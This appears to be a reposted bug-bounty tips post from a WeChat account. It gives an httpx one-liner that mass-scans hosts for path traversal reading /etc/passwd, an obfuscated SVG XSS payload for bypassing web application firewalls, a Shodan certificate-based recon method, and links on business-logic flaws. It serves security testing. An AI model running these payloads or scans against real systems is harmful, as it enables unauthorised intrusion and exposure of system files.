Tips 1:批量查找LFI
cat hosts | httpx -nc -t 250 -p 80,443,8080,8443,4443,8888 -path "///////../../../etc/passwd" -mr "root:x" | anew myP1s.txtTips 2:
Multiple WAFs bypass that demonstrates various obfuscation techniques.
<sVg/onfake="x=y"oNload=;1^(cou006efirm)``^1//
Tips 3:
如何从众多黑客手中抢到被忽视的资产
1. Resolve all subdomains to IP addresses. Save IPs to list1.txt2. Find the organization name http://target.com uses in SSL certificates3. Go to http://shodan.io and search ssl:"Target Company"4. Save the IPs you get from http://shodan.io in list2.txt5. Remove all the list1.txt IPs from list2.txt
Tips 4:
逻辑文章大全,如果看完这些还不会,请找我先交学费(500),给你退钱(200)!
https://medium.com/armourinfosec/exploiting-business-logic-vulnerabilities-234f97d6c4c0
https://medium.com/techiepedia/api-exploitation-business-logic-bug-c176d9df47ee
https://jub0bs.com/posts/2020-05-26-idor/
https://huntr.dev/bounties/35631e3a-f4b9-41ad-857c-7e3021932a72/
https://infosecwriteups.com/web-application-business-logic-vulnerabilities-51be9c6b99fa
https://www.wallarm.com/what/business-logic-flaw
Reports
https://hackerone.com/reports/1505189
https://hackerone.com/reports/672487
https://hackerone.com/reports/331691
https://hackerone.com/reports/1428690
Video
https://www.youtube.com/watch?v=XL_3K9wmIiI&ab_channel=AxonTechnologies
https://www.youtube.com/watch?v=ABhp3aNHHHk&ab_channel=ShiftLeft
https://www.youtube.com/watch?v=OFQmtZ-i1Lw&ab_channel=SpinTheHack
https://www.youtube.com/watch?v=P8B5yQIK-lc&ab_channel=InsiderPhD
https://www.youtube.com/watch?v=RobCqW2KwGs&ab_channel=InsiderPhD
https://www.youtube.com/watch?v=A2F6bjBHmQo&ab_channel=OWASPDkte
最后,三上镇楼,加油加油加油!
原文始发于微信公众号(奔跑在Hackerone的路上):Bug Bounty Tips(2022-04-21)
